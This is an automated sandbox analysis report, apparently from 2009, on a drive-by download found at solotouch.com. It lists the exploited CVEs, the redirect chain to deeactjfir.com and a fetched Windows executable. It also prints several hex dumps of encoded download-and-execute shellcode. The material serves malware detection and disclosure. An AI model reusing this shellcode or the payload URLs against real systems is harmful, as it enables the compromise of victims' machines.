Analysis report for http://solotouch.com

Sample Overview

URLhttp://solotouch.com
MD5b9f6db0c66541b5db8938728758f4ab1
Analysis Started2009-04-27 11:36:21
Report Generated2009-04-27 11:39:51
Jsand version1.03.02

Detection results

DetectorResult
Jsand 1.03.02malicious

Exploits

NameDescriptionReference
SuperBuddy LinkSBIconsThe LinkSBIcons method in the AOL's SuperBuddy ActiveX control (Sb.SuperBuddy.1) dereferences an arbitrary function pointerCVE-2006-5820
QuickTime RTSPStack-based buffer overflow in Apple QuickTime via an RTSP response with a long Content-Type headerCVE-2007-0015

Deobfuscation results

Evals

Writes

Network Activity

Requests

URLStatusContent Type
http://solotouch.com200text/html
http://solotouch.com/includes/scripts/sbar.js200text/javascript
http://search.twitter.com/trends/weekly.json?callback=c&exclude=hashtags200text/javascript
http://www.google-analytics.com/urchin.js200text/javascript
http://www.google.com/jsapi200text/javascript
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js200text/javascript
http://as.ad611.com/js/textlink.js200text/javascript
http://deeactjfir.com/ld/dxtrbc/302text/html
http://deeactjfir.com/cgi-bin/index.cgi?dx200text/html
http://deeactjfir.com/cgi-bin/index.cgi?ECVCEzzEZzZZsZrZZZzClEkuuMZEZlsFTOVTZMMrMTlTOFssZzEuECMVrurOZZZZZZZZZZ200text/javascript
about:blank200text/html
http://deeactjfir.com/cgi-bin/index.cgi?ECVCEzzEZzZZsZrZZzzClEkuuMZEZlsFTOVTZMMrMTlTMEZZZzZkZl00000000zr200application/pdf

Redirects

FromTo
http://deeactjfir.com/ld/dxtrbc/http://deeactjfir.com/cgi-bin/index.cgi?dx

ActiveX controls

Shellcode and Malware

HexadecimalASCII
90 90 90 90 90 90 90 90  90 90 e8 00 00 00 00 5d 
83 c5 14 b9 92 01 00 00  b0 2b 30 45 00 45 49 75 
f9 eb 00 bb bb bb bb bb  bb bb bb c2 d7 2b 2b 2b 
74 4f 8a 1b 2b 2b 2b 53  27 a0 6b 27 a0 5b 37 86 
a0 43 23 c0 22 a0 6b 1f  a6 6b 57 a0 43 17 a0 dc 
41 2f 72 c3 a4 2b 2b 2b  c9 d2 43 44 45 2b 2b 43 
5e 59 47 46 7f d4 3d a0  c3 c3 52 2b 2b 2b a0 fc 
6c ab 14 2b 5e d1 6c 7c  6c ab 14 2b 5e d1 a0 c4 
74 18 e2 aa c7 2f 2a 2b  2b a0 f7 7a 79 78 43 2f 
2a 2b 2b d4 7d 27 71 72  7a 79 a0 29 78 68 ab 10 
2b 5e d1 aa 50 d7 05 4e  53 4e 5e 28 a8 c0 23 a2 
28 ec 68 2f 05 4e 53 4e  ed 68 23 2b 70 a1 ea 2f 
1b a3 6e 2b 18 eb 7b 7b  78 7c 7b d4 7d 3b a8 d3 
2b 5e 2d 41 2a 78 d4 7d  2f 71 72 a8 e9 2f 6a ab 
11 2b 5e 9f d4 7d 23 7a  7d a0 5e 17 a0 5f 05 53 
28 de 7d a0 5d 0b 28 de  18 e2 62 6a 86 28 ee 18 
f0 24 95 3b 11 fd 5f 23  ea e0 26 28 f1 6b c0 da 
10 34 5e cc 75 a0 75 0f  28 f6 4d a0 27 60 a0 75 
37 28 f6 a0 2f a0 28 ee  80 75 72 e8 c3 d4 d5 d4 
d4 a5 65 25 c7 b3 d5 a1  25 55 f3 c9 58 18 e1 a1 
70 1d 31 04 5b 5c 67 68  60 2b 43 5f 5f 5b 11 04 
04 4f 4e 4e 4a 48 5f 41  4d 42 59 05 48 44 46 04 
48 4c 42 06 49 42 45 04  42 45 4f 4e 53 05 48 4c 
42 14 6e 68 7d 68 6e 51  51 6e 71 51 71 71 58 71 
59 71 71 66 51 68 47 6e  40 5e 5e 66 71 6e 71 47 
58 6d 7f 64 7d 7f 71 66  66 59 66 7f 47 7f 66 6e 
71 71 71 51 71 40 71 47  71 71 71 71 71 71 71 71 
71 6d 71 2b 2b 00 
...............]
.........+0E.EIu
.............+++
tO..+++S'.k'.[7.
.C#.".k..kW.C...
A/r..+++..CDE++C
^YGF..=...R+++..
l..+^.l|l..+^...
t..../*++..zyxC/
*++.}'qrzy.)xh..
+^..P..NSN^(..#.
(.h/.NSN.h#+p../
..n+..{{x|{.};..
+^-A*x.}/qr../j.
.+^..}#z}.^.._.S
(.}.].(...bj.(..
.$.;.._#..&(.k..
.4^.u.u.(.M.'`.u
7(../.(..ur.....
..e%....%U..X...
p.1.[\gh`+C__[..
.ONNJH_AMBY.HDF.
HLB.IBE.BEONS.HL
B.nh}hnQQnqQqqXq
YqqfQhGn@^^fqnqG
Xm.d}.qffYf.G.fn
qqqQq@qGqqqqqqqq
qmq++.
90 90 90 90 90 90 90 90  90 90 e8 00 00 00 00 5d 
83 c5 14 b9 92 01 00 00  b0 8a 30 45 00 45 49 75 
f9 eb 00 1a 1a 1a 1a 1a  1a 1a 1a 63 76 8a 8a 8a 
d5 ee 2b ba 8a 8a 8a f2  86 01 ca 86 01 fa 96 27 
01 e2 82 61 83 01 ca be  07 ca f6 01 e2 b6 01 7d 
e0 8e d3 62 05 8a 8a 8a  68 73 e2 e5 e4 8a 8a e2 
ff f8 e6 e7 de 75 9c 01  62 62 f3 8a 8a 8a 01 5d 
cd 0a b5 8a ff 70 cd dd  cd 0a b5 8a ff 70 01 65 
d5 b9 43 0b 66 8e 8b 8a  8a 01 56 db d8 d9 e2 8e 
8b 8a 8a 75 dc 86 d0 d3  db d8 01 88 d9 c9 0a b1 
8a ff 70 0b f1 76 a4 ef  f2 ef ff 89 09 61 82 03 
89 4d c9 8e a4 ef f2 ef  4c c9 82 8a d1 00 4b 8e 
ba 02 cf 8a b9 4a da da  d9 dd da 75 dc 9a 09 72 
8a ff 8c e0 8b d9 75 dc  8e d0 d3 09 48 8e cb 0a 
b0 8a ff 3e 75 dc 82 db  dc 01 ff b6 01 fe a4 f2 
89 7f dc 01 fc aa 89 7f  b9 43 c3 cb 27 89 4f b9 
51 85 34 9a b0 5c fe 82  4b 41 87 89 50 ca 61 7b 
b1 95 ff 6d d4 01 d4 ae  89 57 ec 01 86 c1 01 d4 
96 89 57 01 8e 01 89 4f  21 d4 d3 49 62 75 74 75 
75 04 c4 84 66 12 74 00  84 f4 52 68 f9 b9 40 00 
d1 bc 90 a5 fa ec c4 ce  eb 8a e2 fe fe fa b0 a5 
a5 ee ef ef eb e9 fe e0  ec e3 f8 a4 e9 e5 e7 a5 
e9 ed e3 a7 e8 e3 e4 a5  e3 e4 ee ef f2 a4 e9 ed 
e3 b5 cf c9 dc c9 cf f0  f0 cf d0 f0 d0 d0 f9 d0 
f8 d0 d0 c7 f0 c9 e6 cf  e1 ff ff c7 d0 cf d0 e6 
f9 cc de c5 dc de d0 c7  c7 f8 c7 de e6 de c7 d0 
d0 d0 d0 f0 d0 e1 d0 e6  d0 d0 d0 d0 d0 d0 d0 d0 
f0 f8 d0 8a 8a 00 
...............]
..........0E.EIu
...........cv...
..+............'
...a...........}
...b....hs......
.....u..bb.....]
.....p.......p.e
..C.f.....V.....
...u............
..p..v.......a..
.M......L.....K.
.....J.....u...r
......u.....H...
...>u...........
.........C..'.O.
Q.4..\..KA..P.a{
...m.....W......
..W....O!..Ibutu
u...f.t...Rh..@.
................
................
................
................
................
................
................
......
90 90 90 90 90 90 90 90  90 90 e8 00 00 00 00 5d 
83 c5 14 b9 92 01 00 00  b0 28 30 45 00 45 49 75 
f9 eb 00 b8 b8 b8 b8 b8  b8 b8 b8 c1 d4 28 28 28 
77 4c 89 18 28 28 28 50  24 a3 68 24 a3 58 34 85 
a3 40 20 c3 21 a3 68 1c  a5 68 54 a3 40 14 a3 df 
42 2c 71 c0 a7 28 28 28  ca d1 40 47 46 28 28 40 
5d 5a 44 45 7c d7 3e a3  c0 c0 51 28 28 28 a3 ff 
6f a8 17 28 5d d2 6f 7f  6f a8 17 28 5d d2 a3 c7 
77 1b e1 a9 c4 2c 29 28  28 a3 f4 79 7a 7b 40 2c 
29 28 28 d7 7e 24 72 71  79 7a a3 2a 7b 6b a8 13 
28 5d d2 a9 53 d4 06 4d  50 4d 5d 2b ab c3 20 a1 
2b ef 6b 2c 06 4d 50 4d  ee 6b 20 28 73 a2 e9 2c 
18 a0 6d 28 1b e8 78 78  7b 7f 78 d7 7e 38 ab d0 
28 5d 2e 42 29 7b d7 7e  2c 72 71 ab ea 2c 69 a8 
12 28 5d 9c d7 7e 20 79  7e a3 5d 14 a3 5c 06 50 
2b dd 7e a3 5e 08 2b dd  1b e1 61 69 85 2b ed 1b 
f3 27 96 38 12 fe 5c 20  e9 e3 25 2b f2 68 c3 d9 
13 37 5d cf 76 a3 76 0c  2b f5 4e a3 24 63 a3 76 
34 2b f5 a3 2c a3 2b ed  83 76 71 eb c0 d7 d6 d7 
d7 a6 66 26 c4 b0 d6 a2  26 56 f0 ca 5b 1b e2 a2 
73 1e 32 07 58 7d 7e 64  51 28 40 5c 5c 58 12 07 
07 4c 4d 4d 49 4b 5c 42  4e 41 5a 06 4b 47 45 07 
4b 4f 41 05 4a 41 46 07  41 46 4c 4d 50 06 4b 4f 
41 17 6d 6b 7e 6b 6d 52  52 6d 72 52 72 72 5b 72 
5a 72 72 65 52 6b 44 6d  43 5d 5d 65 72 6d 72 44 
5b 6e 7c 67 7e 7c 72 65  65 5a 65 7c 44 7c 65 72 
72 72 72 52 72 43 72 44  72 72 72 72 72 72 72 72 
52 65 72 28 28 00 
...............]
.........(0E.EIu
.............(((
wL..(((P$.h$.X4.
.@ .!.h..hT.@...
B,q..(((..@GF((@
]ZDE|.>...Q(((..
o..(].o.o..(]...
w....,)((..yz{@,
)((.~$rqyz.*{k..
(]..S..MPM]+.. .
+.k,.MPM.k (s..,
..m(..xx{.x.~8..
(].B){.~,rq..,i.
.(]..~ y~.]..\.P
+.~.^.+...ai.+..
.'.8..\ ..%+.h..
.7].v.v.+.N.$c.v
4+..,.+..vq.....
..f&....&V..[...
s.2.X}~dQ(@\\X..
.LMMIK\BNAZ.KGE.
KOA.JAF.AFLMP.KO
A.mk~kmRRmrRrr[r
ZrreRkDmC]]ermrD
[n|g~|reeZe|D|er
rrrRrCrDrrrrrrrr
Rer((.
90 90 90 90 90 90 90 90  90 90 e8 00 00 00 00 5d 
83 c5 14 b9 92 01 00 00  b0 b6 30 45 00 45 49 75 
f9 eb 00 26 26 26 26 26  26 26 26 5f 4a b6 b6 b6 
e9 d2 17 86 b6 b6 b6 ce  ba 3d f6 ba 3d c6 aa 1b 
3d de be 5d bf 3d f6 82  3b f6 ca 3d de 8a 3d 41 
dc b2 ef 5e 39 b6 b6 b6  54 4f de d9 d8 b6 b6 de 
c3 c4 da db e2 49 a0 3d  5e 5e cf b6 b6 b6 3d 61 
f1 36 89 b6 c3 4c f1 e1  f1 36 89 b6 c3 4c 3d 59 
e9 85 7f 37 5a b2 b7 b6  b6 3d 6a e7 e4 e5 de b2 
b7 b6 b6 49 e0 ba ec ef  e7 e4 3d b4 e5 f5 36 8d 
b6 c3 4c 37 cd 4a 98 d3  ce d3 c3 b5 35 5d be 3f 
b5 71 f5 b2 98 d3 ce d3  70 f5 be b6 ed 3c 77 b2 
86 3e f3 b6 85 76 e6 e6  e5 e1 e6 49 e0 a6 35 4e 
b6 c3 b0 dc b7 e5 49 e0  b2 ec ef 35 74 b2 f7 36 
8c b6 c3 02 49 e0 be e7  e0 3d c3 8a 3d c2 98 ce 
b5 43 e0 3d c0 96 b5 43  85 7f ff f7 1b b5 73 85 
6d b9 08 a6 8c 60 c2 be  77 7d bb b5 6c f6 5d 47 
8d a9 c3 51 e8 3d e8 92  b5 6b d0 3d ba fd 3d e8 
aa b5 6b 3d b2 3d b5 73  1d e8 ef 75 5e 49 48 49 
49 38 f8 b8 5a 2e 48 3c  b8 c8 6e 54 c5 85 7c 3c 
ed 80 ac 99 c6 d0 e3 c3  d7 b6 de c2 c2 c6 8c 99 
99 d2 d3 d3 d7 d5 c2 dc  d0 df c4 98 d5 d9 db 99 
d5 d1 df 9b d4 df d8 99  df d8 d2 d3 ce 98 d5 d1 
df 89 f3 f5 e0 f5 f3 cc  cc f3 ec cc ec ec c5 ec 
c4 ec ec fb cc f5 da f3  dd c3 c3 fb ec f3 ec da 
c5 f0 e2 f9 e0 e2 ec fb  fb c4 fb e2 da e2 fb ec 
ec ec ec cc ec dd ec da  ec ec ec ec ec ec ec ec 
cc f9 ec b6 b6 00 
...............]
..........0E.EIu
...&&&&&&&&_J...
.........=..=...
=..].=..;..=..=A
...^9...TO......
.....I.=^^....=a
.6...L...6...L=Y
...7Z....=j.....
...I......=...6.
..L7.J......5].?
.q......p....<w.
.>...v.....I..5N
......I....5t..6
....I....=..=...
.C.=...C......s.
m....`..w}..l.]G
...Q.=...k.=..=.
..k=.=.s...u^IHI
I8..Z.H<..nT..|<
................
................
................
................
................
................
................
......

Additional (potential) malware:

URLTypeHashAnalysis
http://deeactjfir.com/cgi-bin/index.cgi?ECVCEzzEZzZZsZrZZMzClEkuuMZEZlsFTOVTZMMrMTlTMEZZZzZkZlZZZZZZZZZFZ N/A N/A
http://deeactjfir.com/cgi-bin/index.cgi?ECVCEzzEZzZZsZrZZMzClEkuuMZEZlsFTOVTZMMrMTlTMZZZZzZkZlZZZZZZZZzMZ MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit b00a570c3315f416586e786331b26fc1
http://deeactjfir.com/cgi-bin/index.cgi?ECVCEzzEZzZZsZrZZMzClEkuuMZEZlsFTOVTZMMrMTlTMZZZZzZkZlZZZZZZZZzOZ N/A N/A
http://deeactjfir.com/cgi-bin/index.cgi?ECVCEzzEZzZZsZrZZMzClEkuuMZEZlsFTOVTZMMrMTlTMZZZZzZkZlZZZZZZZZzrZ N/A N/A
http://deeactjfir.com/cgi-bin/index.cgi?ECVCEzzEZzZZsZrZZzzClEkuuMZEZlsFTOVTZMMrMTlTMEZZZzZkZlZZZZZZZZZE N/A N/A